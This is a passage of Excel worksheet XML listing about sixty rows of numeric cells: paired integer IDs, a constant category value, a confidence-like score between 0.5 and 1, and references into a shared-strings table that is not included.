      <c r="C3458">
        <v>6252</v>
      </c>
      <c r="D3458">
        <v>2</v>
      </c>
      <c r="E3458">
        <v>0.94660001993179321</v>
      </c>
      <c r="F3458" t="s">
        <v>5592</v>
      </c>
      <c r="G3458" t="s">
        <v>6836</v>
      </c>
      <c r="H3458" t="s">
        <v>6837</v>
      </c>
    </row>
    <row r="3459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3459" s="1">
        <v>3457</v>
      </c>
      <c r="B3459">
        <v>3967</v>
      </c>
      <c r="C3459">
        <v>3967</v>
      </c>
      <c r="D3459">
        <v>2</v>
      </c>
      <c r="E3459">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3459" t="s">
        <v>5592</v>
      </c>
      <c r="G3459" t="s">
        <v>6838</v>
      </c>
      <c r="H3459" t="s">
        <v>6839</v>
      </c>
    </row>
    <row r="3460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3460" s="1">
        <v>3458</v>
      </c>
      <c r="B3460">
        <v>5675</v>
      </c>
      <c r="C3460">
        <v>5675</v>
      </c>
      <c r="D3460">
        <v>2</v>
      </c>
      <c r="E3460">
        <v>0.56650000810623169</v>
      </c>
      <c r="F3460" t="s">
        <v>5592</v>
      </c>
      <c r="G3460" t="s">
        <v>6840</v>
      </c>
      <c r="H3460" t="s">
        <v>6841</v>
      </c>
    </row>
    <row r="3461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3461" s="1">
        <v>3459</v>
      </c>
      <c r="B3461">
        <v>5676</v>
      </c>
      <c r="C3461">
        <v>5676</v>
      </c>
      <c r="D3461">
        <v>2</v>
      </c>
      <c r="E3461">
        <v>0.61629998683929443</v>
      </c>
      <c r="F3461" t="s">
        <v>5592</v>
      </c>
      <c r="G3461" t="s">
        <v>6842</v>
      </c>
      <c r="H3461" t="s">
        <v>6843</v>
      </c>
    </row>
    <row r="3462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3462" s="1">
        <v>3460</v>
      </c>
      <c r="B3462">
        <v>6256</v>
      </c>
      <c r="C3462">
        <v>6256</v>
      </c>
      <c r="D3462">
        <v>2</v>
      </c>
      <c r="E3462">
        <v>0.95039999485015869</v>
      </c>
      <c r="F3462" t="s">
        <v>5592</v>
      </c>
      <c r="G3462" t="s">
        <v>6844</v>
      </c>
      <c r="H3462" t="s">
        <v>6845</v>
      </c>
    </row>
    <row r="3463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3463" s="1">
        <v>3461</v>
      </c>
      <c r="B3463">
        <v>3993</v>
      </c>
      <c r="C3463">
        <v>3993</v>
      </c>
      <c r="D3463">
        <v>2</v>
      </c>
      <c r="E3463">
        <v>0.99589997529983521</v>
      </c>
      <c r="F3463" t="s">
        <v>5592</v>
      </c>
      <c r="G3463" t="s">
        <v>6846</v>
      </c>
      <c r="H3463" t="s">
        <v>6847</v>
      </c>
    </row>
    <row r="3464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3464" s="1">
        <v>3462</v>
      </c>
      <c r="B3464">
        <v>3995</v>
      </c>
      <c r="C3464">
        <v>3995</v>
      </c>
      <c r="D3464">
        <v>2</v>
      </c>
      <c r="E3464">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3464" t="s">
        <v>5592</v>
      </c>
      <c r="G3464" t="s">
        <v>6848</v>
      </c>
      <c r="H3464" t="s">
        <v>6849</v>
      </c>
    </row>
    <row r="3465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3465" s="1">
        <v>3463</v>
      </c>
      <c r="B3465">
        <v>5350</v>
      </c>
      <c r="C3465">
        <v>5350</v>
      </c>
      <c r="D3465">
        <v>2</v>
      </c>
      <c r="E3465">
        <v>0.60100001096725464</v>
      </c>
      <c r="F3465" t="s">
        <v>5592</v>
      </c>
      <c r="G3465" t="s">
        <v>6850</v>
      </c>
      <c r="H3465" t="s">
        <v>6851</v>
      </c>
    </row>
    <row r="3466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3466" s="1">
        <v>3464</v>
      </c>
      <c r="B3466">
        <v>4028</v>
      </c>
      <c r="C3466">
        <v>4028</v>
      </c>
      <c r="D3466">
        <v>2</v>
      </c>
      <c r="E3466">
        <v>0.63470000028610229</v>
      </c>
      <c r="F3466" t="s">
        <v>5592</v>
      </c>
      <c r="G3466" t="s">
        <v>6852</v>
      </c>
      <c r="H3466" t="s">
        <v>6853</v>
      </c>
    </row>
    <row r="3467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3467" s="1">
        <v>3465</v>
      </c>
      <c r="B3467">
        <v>4029</v>
      </c>
      <c r="C3467">
        <v>4029</v>
      </c>
      <c r="D3467">
        <v>2</v>
      </c>
      <c r="E3467">
        <v>0.53549998998641968</v>
      </c>
      <c r="F3467" t="s">
        <v>5592</v>
      </c>
      <c r="G3467" t="s">
        <v>6854</v>
      </c>
      <c r="H3467" t="s">
        <v>6855</v>
      </c>
    </row>
    <row r="3468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3468" s="1">
        <v>3466</v>
      </c>
      <c r="B3468">
        <v>4030</v>
      </c>
      <c r="C3468">
        <v>4030</v>
      </c>
      <c r="D3468">
        <v>2</v>
      </c>
      <c r="E3468">
        <v>0.6624000072479248</v>
      </c>
      <c r="F3468" t="s">
        <v>5592</v>
      </c>
      <c r="G3468" t="s">
        <v>6856</v>
      </c>
      <c r="H3468" t="s">
        <v>6857</v>
      </c>
    </row>
    <row r="3469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3469" s="1">
        <v>3467</v>
      </c>
      <c r="B3469">
        <v>4031</v>
      </c>
      <c r="C3469">
        <v>4031</v>
      </c>
      <c r="D3469">
        <v>2</v>
      </c>
      <c r="E3469">
        <v>0.99739998579025269</v>
      </c>
      <c r="F3469" t="s">
        <v>5592</v>
      </c>
      <c r="G3469" t="s">
        <v>6858</v>
      </c>
      <c r="H3469" t="s">
        <v>6859</v>
      </c>
    </row>
    <row r="3470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3470" s="1">
        <v>3468</v>
      </c>
      <c r="B3470">
        <v>4032</v>
      </c>
      <c r="C3470">
        <v>4032</v>
      </c>
      <c r="D3470">
        <v>2</v>
      </c>
      <c r="E3470">
        <v>0.81190001964569092</v>
      </c>
      <c r="F3470" t="s">
        <v>5592</v>
      </c>
      <c r="G3470" t="s">
        <v>6860</v>
      </c>
      <c r="H3470" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="3471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3471" s="1">
        <v>3469</v>
      </c>
      <c r="B3471">
        <v>4034</v>
      </c>
      <c r="C3471">
        <v>4034</v>
      </c>
      <c r="D3471">
        <v>2</v>
      </c>
      <c r="E3471">
        <v>0.80470001697540283</v>
      </c>
      <c r="F3471" t="s">
        <v>5592</v>
      </c>
      <c r="G3471" t="s">
        <v>6862</v>
      </c>
      <c r="H3471" t="s">
        <v>6863</v>
      </c>
    </row>
    <row r="3472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3472" s="1">
        <v>3470</v>
      </c>
      <c r="B3472">
        <v>4035</v>
      </c>
      <c r="C3472">
        <v>4035</v>
      </c>
      <c r="D3472">
        <v>2</v>
      </c>
      <c r="E3472">
        <v>0.97100001573562622</v>
      </c>
      <c r="F3472" t="s">
        <v>5592</v>
      </c>
      <c r="G3472" t="s">
        <v>6864</v>
      </c>
      <c r="H3472" t="s">
        <v>6865</v>
      </c>
    </row>
    <row r="3473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3473" s="1">
        <v>3471</v>
      </c>
      <c r="B3473">
        <v>4027</v>
      </c>
      <c r="C3473">
        <v>4027</v>
      </c>
      <c r="D3473">
        <v>2</v>
      </c>
      <c r="E3473">
        <v>0.9715999960899353</v>
      </c>
      <c r="F3473" t="s">
        <v>5592</v>
      </c>
      <c r="G3473" t="s">
        <v>6866</v>
      </c>
      <c r="H3473" t="s">
        <v>6867</v>
      </c>
    </row>
    <row r="3474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3474" s="1">
        <v>3472</v>
      </c>
      <c r="B3474">
        <v>4038</v>
      </c>
      <c r="C3474">
        <v>4038</v>
      </c>
      <c r="D3474">
        <v>2</v>
      </c>
      <c r="E3474">
        <v>0.99169999361038208</v>
      </c>
      <c r="F3474" t="s">
        <v>5592</v>
      </c>
      <c r="G3474" t="s">
        <v>6868</v>
      </c>
      <c r="H3474" t="s">
        <v>6869</v>
      </c>
    </row>
    <row r="3475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3475" s="1">
        <v>3473</v>
      </c>
      <c r="B3475">
        <v>6229</v>
      </c>
      <c r="C3475">
        <v>6229</v>
      </c>
      <c r="D3475">
        <v>2</v>
      </c>
      <c r="E3475">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3475" t="s">
        <v>5592</v>
      </c>
      <c r="G3475" t="s">
        <v>6870</v>
      </c>
      <c r="H3475" t="s">
        <v>6871</v>
      </c>
    </row>
    <row r="3476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3476" s="1">
        <v>3474</v>
      </c>
      <c r="B3476">
        <v>5330</v>
      </c>
      <c r="C3476">
        <v>5330</v>
      </c>
      <c r="D3476">
        <v>2</v>
      </c>
      <c r="E3476">
        <v>0.97409999370574951</v>
      </c>
      <c r="F3476" t="s">
        <v>5592</v>
      </c>
      <c r="G3476" t="s">
        <v>6872</v>
      </c>
      <c r="H3476" t="s">
        <v>6873</v>
      </c>
    </row>
    <row r="3477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3477" s="1">
        <v>3475</v>
      </c>
      <c r="B3477">
        <v>5329</v>
      </c>
      <c r="C3477">
        <v>5329</v>
      </c>
      <c r="D3477">
        <v>2</v>
      </c>
      <c r="E3477">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3477" t="s">
        <v>5592</v>
      </c>
      <c r="G3477" t="s">
        <v>6874</v>
      </c>
      <c r="H3477" t="s">
        <v>6875</v>
      </c>
    </row>
    <row r="3478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3478" s="1">
        <v>3476</v>
      </c>
      <c r="B3478">
        <v>5328</v>
      </c>
      <c r="C3478">
        <v>5328</v>
      </c>
      <c r="D3478">
        <v>2</v>
      </c>
      <c r="E3478">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3478" t="s">
        <v>5592</v>
      </c>
      <c r="G3478" t="s">
        <v>6876</v>
      </c>
      <c r="H3478" t="s">
        <v>6877</v>
      </c>
    </row>
    <row r="3479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3479" s="1">
        <v>3477</v>
      </c>
      <c r="B3479">
        <v>5692</v>
      </c>
      <c r="C3479">
        <v>5692</v>
      </c>
      <c r="D3479">
        <v>2</v>
      </c>
      <c r="E3479">
        <v>0.63990002870559692</v>
      </c>
      <c r="F3479" t="s">
        <v>5592</v>
      </c>
      <c r="G3479" t="s">
        <v>6878</v>
      </c>
      <c r="H3479" t="s">
        <v>6879</v>
      </c>
    </row>
    <row r="3480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3480" s="1">
        <v>3478</v>
      </c>
      <c r="B3480">
        <v>5695</v>
      </c>
      <c r="C3480">
        <v>5695</v>
      </c>
      <c r="D3480">
        <v>2</v>
      </c>
      <c r="E3480">
        <v>0.91540002822875977</v>
      </c>
      <c r="F3480" t="s">
        <v>5592</v>
      </c>
      <c r="G3480" t="s">
        <v>6880</v>
      </c>
      <c r="H3480" t="s">
        <v>6881</v>
      </c>
    </row>
    <row r="3481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3481" s="1">
        <v>3479</v>
      </c>
      <c r="B3481">
        <v>4044</v>
      </c>
      <c r="C3481">
        <v>4044</v>
      </c>
      <c r="D3481">
        <v>2</v>
      </c>
      <c r="E3481">
        <v>0.91869997978210449</v>
      </c>
      <c r="F3481" t="s">
        <v>5592</v>
      </c>
      <c r="G3481" t="s">
        <v>6882</v>
      </c>
      <c r="H3481" t="s">
        <v>6883</v>
      </c>
    </row>
    <row r="3482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3482" s="1">
        <v>3480</v>
      </c>
      <c r="B3482">
        <v>4039</v>
      </c>
      <c r="C3482">
        <v>4039</v>
      </c>
      <c r="D3482">
        <v>2</v>
      </c>
      <c r="E3482">
        <v>0.89639997482299805</v>
      </c>
      <c r="F3482" t="s">
        <v>5592</v>
      </c>
      <c r="G3482" t="s">
        <v>6884</v>
      </c>
      <c r="H3482" t="s">
        <v>6885</v>
      </c>
    </row>
    <row r="3483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3483" s="1">
        <v>3481</v>
      </c>
      <c r="B3483">
        <v>4048</v>
      </c>
      <c r="C3483">
        <v>4048</v>
      </c>
      <c r="D3483">
        <v>2</v>
      </c>
      <c r="E3483">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3483" t="s">
        <v>5592</v>
      </c>
      <c r="G3483" t="s">
        <v>6886</v>
      </c>
      <c r="H3483" t="s">
        <v>6887</v>
      </c>
    </row>
    <row r="3484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3484" s="1">
        <v>3482</v>
      </c>
      <c r="B3484">
        <v>4026</v>
      </c>
      <c r="C3484">
        <v>4026</v>
      </c>
      <c r="D3484">
        <v>2</v>
      </c>
      <c r="E3484">
        <v>0.97740000486373901</v>
      </c>
      <c r="F3484" t="s">
        <v>5592</v>
      </c>
      <c r="G3484" t="s">
        <v>6888</v>
      </c>
      <c r="H3484" t="s">
        <v>6889</v>
      </c>
    </row>
    <row r="3485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3485" s="1">
        <v>3483</v>
      </c>
      <c r="B3485">
        <v>4025</v>
      </c>
      <c r="C3485">
        <v>4025</v>
      </c>
      <c r="D3485">
        <v>2</v>
      </c>
      <c r="E3485">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3485" t="s">
        <v>5592</v>
      </c>
      <c r="G3485" t="s">
        <v>6890</v>
      </c>
      <c r="H3485" t="s">
        <v>6891</v>
      </c>
    </row>
    <row r="3486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3486" s="1">
        <v>3484</v>
      </c>
      <c r="B3486">
        <v>6243</v>
      </c>
      <c r="C3486">
        <v>6243</v>
      </c>
      <c r="D3486">
        <v>2</v>
      </c>
      <c r="E3486">
        <v>0.98820000886917114</v>
      </c>
      <c r="F3486" t="s">
        <v>5592</v>
      </c>
      <c r="G3486" t="s">
        <v>6892</v>
      </c>
      <c r="H3486" t="s">
        <v>6893</v>
      </c>
    </row>
    <row r="3487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3487" s="1">
        <v>3485</v>
      </c>
      <c r="B3487">
        <v>5344</v>
      </c>
      <c r="C3487">
        <v>5344</v>
      </c>
      <c r="D3487">
        <v>2</v>
      </c>
      <c r="E3487">
        <v>0.92570000886917114</v>
      </c>
      <c r="F3487" t="s">
        <v>5592</v>
      </c>
      <c r="G3487" t="s">
        <v>6894</v>
      </c>
      <c r="H3487" t="s">
        <v>6895</v>
      </c>
    </row>
    <row r="3488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3488" s="1">
        <v>3486</v>
      </c>
      <c r="B3488">
        <v>4001</v>
      </c>
      <c r="C3488">
        <v>4001</v>
      </c>
      <c r="D3488">
        <v>2</v>
      </c>
      <c r="E3488">
        <v>0.60670000314712524</v>
      </c>
      <c r="F3488" t="s">
        <v>5592</v>
      </c>
      <c r="G3488" t="s">
        <v>6896</v>
      </c>
      <c r="H3488" t="s">
        <v>6897</v>
      </c>
    </row>
    <row r="3489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3489" s="1">
        <v>3487</v>
      </c>
      <c r="B3489">
        <v>4002</v>
      </c>
      <c r="C3489">
        <v>4002</v>
      </c>
      <c r="D3489">
        <v>2</v>
      </c>
      <c r="E3489">
        <v>0.99639999866485596</v>
      </c>
      <c r="F3489" t="s">
        <v>5592</v>
      </c>
      <c r="G3489" t="s">
        <v>6898</v>
      </c>
      <c r="H3489" t="s">
        <v>6899</v>
      </c>
    </row>
    <row r="3490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3490" s="1">
        <v>3488</v>
      </c>
      <c r="B3490">
        <v>6241</v>
      </c>
      <c r="C3490">
        <v>6241</v>
      </c>
      <c r="D3490">
        <v>2</v>
      </c>
      <c r="E3490">
        <v>0.88109999895095825</v>
      </c>
      <c r="F3490" t="s">
        <v>5592</v>
      </c>
      <c r="G3490" t="s">
        <v>6900</v>
      </c>
      <c r="H3490" t="s">
        <v>6901</v>
      </c>
    </row>
    <row r="3491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3491" s="1">
        <v>3489</v>
      </c>
      <c r="B3491">
        <v>5343</v>
      </c>
      <c r="C3491">
        <v>5343</v>
      </c>
      <c r="D3491">
        <v>2</v>
      </c>
      <c r="E3491">
        <v>0.63300001621246338</v>
      </c>
      <c r="F3491" t="s">
        <v>5592</v>
      </c>
      <c r="G3491" t="s">
        <v>6902</v>
      </c>
      <c r="H3491" t="s">
        <v>6903</v>
      </c>
    </row>
    <row r="3492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3492" s="1">
        <v>3490</v>
      </c>
      <c r="B3492">
        <v>5342</v>
      </c>
      <c r="C3492">
        <v>5342</v>
      </c>
      <c r="D3492">
        <v>2</v>
      </c>
      <c r="E3492">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3492" t="s">
        <v>5592</v>
      </c>
      <c r="G3492" t="s">
        <v>6904</v>
      </c>
      <c r="H3492" t="s">
        <v>6905</v>
      </c>
    </row>
    <row r="3493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3493" s="1">
        <v>3491</v>
      </c>
      <c r="B3493">
        <v>5332</v>
      </c>
      <c r="C3493">
        <v>5332</v>
      </c>
      <c r="D3493">
        <v>2</v>
      </c>
      <c r="E3493">
        <v>0.81269997358322144</v>
      </c>
      <c r="F3493" t="s">
        <v>5592</v>
      </c>
      <c r="G3493" t="s">
        <v>6906</v>
      </c>
      <c r="H3493" t="s">
        <v>6907</v>
      </c>
    </row>
    <row r="3494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3494" s="1">
        <v>3492</v>
      </c>
      <c r="B3494">
        <v>5341</v>
      </c>
      <c r="C3494">
        <v>5341</v>
      </c>
      <c r="D3494">
        <v>2</v>
      </c>
      <c r="E3494">
        <v>0.89209997653961182</v>
      </c>
      <c r="F3494" t="s">
        <v>5592</v>
      </c>
      <c r="G3494" t="s">
        <v>6908</v>
      </c>
      <c r="H3494" t="s">
        <v>6909</v>
      </c>
    </row>
    <row r="3495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3495" s="1">
        <v>3493</v>
      </c>
      <c r="B3495">
        <v>4017</v>
      </c>
      <c r="C3495">
        <v>4017</v>
      </c>
      <c r="D3495">
        <v>2</v>
      </c>
      <c r="E3495">
        <v>0.91759997606277466</v>
      </c>
      <c r="F3495" t="s">
        <v>5592</v>
      </c>
      <c r="G3495" t="s">
        <v>6910</v>
      </c>
      <c r="H3495" t="s">
        <v>6911</v>
      </c>
    </row>
    <row r="3496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3496" s="1">
        <v>3494</v>
      </c>
      <c r="B3496">
        <v>4018</v>
      </c>
      <c r="C3496">
        <v>4018</v>
      </c>
      <c r="D3496">
        <v>2</v>
      </c>
      <c r="E3496">
        <v>0.73930001258850098</v>
      </c>
      <c r="F3496" t="s">
        <v>5592</v>
      </c>
      <c r="G3496" t="s">
        <v>6912</v>
      </c>
      <c r="H3496" t="s">
        <v>6913</v>
      </c>
    </row>
    <row r="3497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3497" s="1">
        <v>3495</v>
      </c>
      <c r="B3497">
        <v>4019</v>
      </c>
      <c r="C3497">
        <v>4019</v>
      </c>
      <c r="D3497">
        <v>2</v>
      </c>
      <c r="E3497">
        <v>0.58499997854232788</v>
      </c>
      <c r="F3497" t="s">
        <v>5592</v>
      </c>
      <c r="G3497" t="s">
        <v>6914</v>
      </c>
      <c r="H3497" t="s">
        <v>6915</v>
      </c>
    </row>
    <row r="3498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3498" s="1">
        <v>3496</v>
      </c>
      <c r="B3498">
        <v>5690</v>
      </c>
      <c r="C3498">
        <v>5690</v>
      </c>
      <c r="D3498">
        <v>2</v>
      </c>
      <c r="E3498">
        <v>0.97009998559951782</v>
      </c>
      <c r="F3498" t="s">
        <v>5592</v>
      </c>
      <c r="G3498" t="s">
        <v>6916</v>
      </c>
      <c r="H3498" t="s">
        <v>6917</v>
      </c>
    </row>
    <row r="3499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3499" s="1">
        <v>3497</v>
      </c>
      <c r="B3499">
        <v>4022</v>
      </c>
      <c r="C3499">
        <v>4022</v>
      </c>
      <c r="D3499">
        <v>2</v>
      </c>
      <c r="E3499">
        <v>0.98280000686645508</v>
      </c>
      <c r="F3499" t="s">
        <v>5592</v>
      </c>
      <c r="G3499" t="s">
        <v>6918</v>
      </c>
      <c r="H3499" t="s">
        <v>6919</v>
      </c>
    </row>
    <row r="3500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3500" s="1">
        <v>3498</v>
      </c>
      <c r="B3500">
        <v>4023</v>
      </c>
      <c r="C3500">
        <v>4023</v>
      </c>
      <c r="D3500">
        <v>2</v>
      </c>
      <c r="E3500">
        <v>0.9976000189781189</v>
      </c>
      <c r="F3500" t="s">
        <v>5592</v>
      </c>
      <c r="G3500" t="s">
        <v>6920</v>
      </c>
      <c r="H3500" t="s">
        <v>6921</v>
      </c>
    </row>
    <row r="3501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3501" s="1">
        <v>3499</v>
      </c>
      <c r="B3501">
        <v>5334</v>
      </c>
      <c r="C3501">
        <v>5334</v>
      </c>
      <c r="D3501">
        <v>2</v>
      </c>
      <c r="E3501">
        <v>0.8684999942779541</v>
      </c>
      <c r="F3501" t="s">
        <v>5592</v>
      </c>
      <c r="G3501" t="s">
        <v>6922</v>
      </c>
      <c r="H3501" t="s">
        <v>6923</v>
      </c>
    </row>
    <row r="3502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3502" s="1">
        <v>3500</v>
      </c>
      <c r="B3502">
        <v>4015</v>
      </c>
      <c r="C3502">
        <v>4015</v>
      </c>
      <c r="D3502">
        <v>2</v>
      </c>
      <c r="E3502">
        <v>0.96240001916885376</v>
      </c>
      <c r="F3502" t="s">
        <v>5592</v>
      </c>
      <c r="G3502" t="s">
        <v>6924</v>
      </c>
      <c r="H3502" t="s">
        <v>6925</v>
      </c>
    </row>
    <row r="3503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3503" s="1">
        <v>3501</v>
      </c>
      <c r="B3503">
        <v>5386</v>
      </c>
      <c r="C3503">
        <v>5386</v>
      </c>
      <c r="D3503">
        <v>2</v>
      </c>
      <c r="E3503">
        <v>0.90729999542236328</v>
      </c>
      <c r="F3503" t="s">
        <v>5592</v>
      </c>
      <c r="G3503" t="s">
        <v>6926</v>
      </c>
      <c r="H3503" t="s">
        <v>6927</v>
      </c>
    </row>
    <row r="3504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3504" s="1">
        <v>3502</v>
      </c>
      <c r="B3504">
        <v>5278</v>
      </c>
      <c r="C3504">
        <v>5278</v>
      </c>
      <c r="D3504">
        <v>2</v>
      </c>
      <c r="E3504">
        <v>0.53119999170303345</v>
      </c>
      <c r="F3504" t="s">
        <v>5592</v>
      </c>
      <c r="G3504" t="s">
        <v>6928</v>
      </c>
      <c r="H3504" t="s">
        <v>6929</v>
      </c>
    </row>
    <row r="3505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3505" s="1">
        <v>3503</v>
      </c>
      <c r="B3505">
        <v>5276</v>
      </c>
      <c r="C3505">
        <v>5276</v>
      </c>
      <c r="D3505">
        <v>2</v>
      </c>
      <c r="E3505">
        <v>0.99730002880096436</v>
      </c>
      <c r="F3505" t="s">
        <v>5592</v>
      </c>
      <c r="G3505" t="s">
        <v>6930</v>
      </c>
      <c r="H3505" t="s">
        <v>6931</v>
      </c>
    </row>
    <row r="3506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3506" s="1">
        <v>3504</v>
      </c>
      <c r="B3506">
        <v>6073</v>
      </c>
      <c r="C3506">
        <v>6073</v>
      </c>
      <c r="D3506">
        <v>2</v>
      </c>
      <c r="E3506">
        <v>0.59619998931884766</v>
      </c>
      <c r="F3506" t="s">
        <v>5592</v>
      </c>
      <c r="G3506" t="s">
        <v>6932</v>
      </c>
      <c r="H3506" t="s">
        <v>6933</v>
      </c>
    </row>
    <row r="3507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3507" s="1">
        <v>3505</v>
      </c>
      <c r="B3507">
        <v>5211</v>
      </c>
      <c r="C3507">
        <v>5211</v>
      </c>
      <c r="D3507">
        <v>2</v>
      </c>
      <c r="E3507">
        <v>0.64529997110366821</v>
      </c>
      <c r="F3507" t="s">
        <v>5592</v>
      </c>
      <c r="G3507" t="s">
        <v>6934</v>
      </c>
      <c r="H3507" t="s">
        <v>6935</v>
      </c>
    </row>
    <row r="3508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3508" s="1">
        <v>3506</v>
      </c>
      <c r="B3508">
        <v>5210</v>
      </c>
      <c r="C3508">
        <v>5210</v>
      </c>
      <c r="D3508">
        <v>2</v>
      </c>
      <c r="E3508">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3508" t="s">
        <v>5592</v>
      </c>
      <c r="G3508" t="s">
        <v>6936</v>
      </c>
      <c r="H3508" t="s">
        <v>6937</v>
      </c>
    </row>
    <row r="3509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3509" s="1">
        <v>3507</v>
      </c>
      <c r="B3509">
        <v>5209</v>
      </c>
      <c r="C3509">
        <v>5209</v>
      </c>
      <c r="D3509">
        <v>2</v>
      </c>
      <c r="E3509">
        <v>0.74940001964569092</v>
      </c>
      <c r="F3509" t="s">
        <v>5592</v>
      </c>
      <c r="G3509" t="s">
        <v>6938</v>
      </c>
      <c r="H3509" t="s">
        <v>6939</v>
      </c>
    </row>
    <row r="3510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3510" s="1">
        <v>3508</v>
      </c>
      <c r="B3510">
        <v>5208</v>
      </c>
      <c r="C3510">
        <v>5208</v>
      </c>
      <c r="D3510">
        <v>2</v>
      </c>
      <c r="E3510">
        <v>0.61629998683929443</v>
      </c>
      <c r="F3510" t="s">
        <v>5592</v>
      </c>
      <c r="G3510" t="s">
        <v>6940</v>
      </c>
      <c r="H3510" t="s">
        <v>6941</v>
      </c>
    </row>
    <row r="3511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3511" s="1">
        <v>3509</v>
      </c>
      <c r="B3511">
        <v>4352</v>
      </c>
      <c r="C3511">
        <v>4352</v>
      </c>
      <c r="D3511">
        <v>2</v>
      </c>
      <c r="E3511">
        <v>0.99180001020431519</v>
      </c>
      <c r="F3511" t="s">
        <v>5592</v>
      </c>
      <c r="G3511" t="s">
        <v>6942</v>
      </c>
      <c r="H3511" t="s">
        <v>6943</v>
      </c>
    </row>
    <row r="3512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3512" s="1">
        <v>3510</v>
      </c>
      <c r="B3512">
        <v>6068</v>
      </c>
      <c r="C3512">
        <v>6068</v>
      </c>
      <c r="D3512">
        <v>2</v>
      </c>
      <c r="E3512">
        <v>0.66729998588562012</v>
      </c>
      <c r="F3512" t="s">
        <v>5592</v>
      </c>
      <c r="G3512" t="s">
        <v>6944</v>
      </c>
      <c r="H3512" t="s">
        <v>6945</v>
      </c>
    </row>
    <row r="3513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3513" s="1">
        <v>3511</v>
      </c>
      <c r="B3513">
        <v>4354</v>
      </c>
      <c r="C3513">
        <v>4354</v>
      </c>
      <c r="D3513">
        <v>2</v>
      </c>
      <c r="E3513">
        <v>0.52240002155303955</v>
      </c>
      <c r="F3513" t="s">
        <v>5592</v>
      </c>
      <c r="G3513" t="s">
        <v>6946</v>
      </c>
      <c r="H3513" t="s">
        <v>6947</v>
      </c>
    </row>
    <row r="3514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3514" s="1">
        <v>3512</v>
      </c>
      <c r="B3514">
        <v>4355</v>
      </c>
      <c r="C3514">
        <v>4355</v>
      </c>
      <c r="D3514">
        <v>2</v>
      </c>
      <c r="E3514">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3514" t="s">
        <v>5592</v>
      </c>
      <c r="G3514" t="s">
        <v>6948</v>
      </c>
      <c r="H3514" t="s">
        <v>6949</v>
      </c>
    </row>
    <row r="3515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3515" s="1">
        <v>3513</v>
      </c>
      <c r="B3515">
        <v>5735</v>
      </c>
      <c r="C3515">
        <v>5735</v>
      </c>
      <c r="D3515">
        <v>2</v>
      </c>
      <c r="E3515">
        <v>0.99620002508163452</v>
      </c>
      <c r="F3515" t="s">
        <v>5592</v>
      </c>
      <c r="G3515" t="s">
        <v>6950</v>
      </c>
      <c r="H3515" t="s">
        <v>6951</v>
      </c>
    </row>
    <row r="3516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3516" s="1">
        <v>3514</v>
      </c>
      <c r="B3516">
        <v>6067</v>
      </c>
      <c r="C3516">
        <v>6067</v>
      </c>
      <c r="D3516">
        <v>2</v>
      </c>
      <c r="E3516">
        <v>0.9747999906539917</v>
      </c>
      <c r="F3516" t="s">
